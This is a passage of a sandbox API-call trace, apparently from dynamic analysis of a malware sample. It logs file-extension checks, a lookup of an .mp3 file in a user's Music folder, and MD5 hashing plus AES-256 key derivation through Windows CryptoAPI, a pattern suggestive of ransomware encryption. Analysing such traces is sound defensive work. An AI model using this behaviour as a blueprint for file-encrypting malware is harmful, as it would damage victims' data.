hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.888] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.888] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.888] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.888] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.888] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.888] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.888] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59695b30, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0x9c1fc00, ftLastAccessTime.dwHighDateTime=0x1d5b6c8, ftLastWriteTime.dwLowDateTime=0x9c1fc00, ftLastWriteTime.dwHighDateTime=0x1d5b6c8, nFileSizeHigh=0x0, nFileSizeLow=0xec0, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="f5eSIWN.mp3", cAlternateFileName="")) returned 0x7c2240 [0037.888] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.889] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.889] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.889] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.889] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.889] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.889] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.889] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.889] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.889] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.889] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.889] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.890] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.890] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.890] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.890] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.890] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.891] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.891] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.891] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.891] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.891] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.891] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.892] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.892] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.892] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.892] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.892] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.892] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.892] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.892] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.892] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.892] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.892] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.892] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.892] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.893] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0037.893] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.893] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.893] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.893] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.893] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.894] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.894] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.894] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.894] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.895] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.895] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.895] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.895] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.895] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.895] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.895] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0037.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.895] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0037.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.896] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.896] CryptDestroyHash (hHash=0x7c2100) returned 1 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.896] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 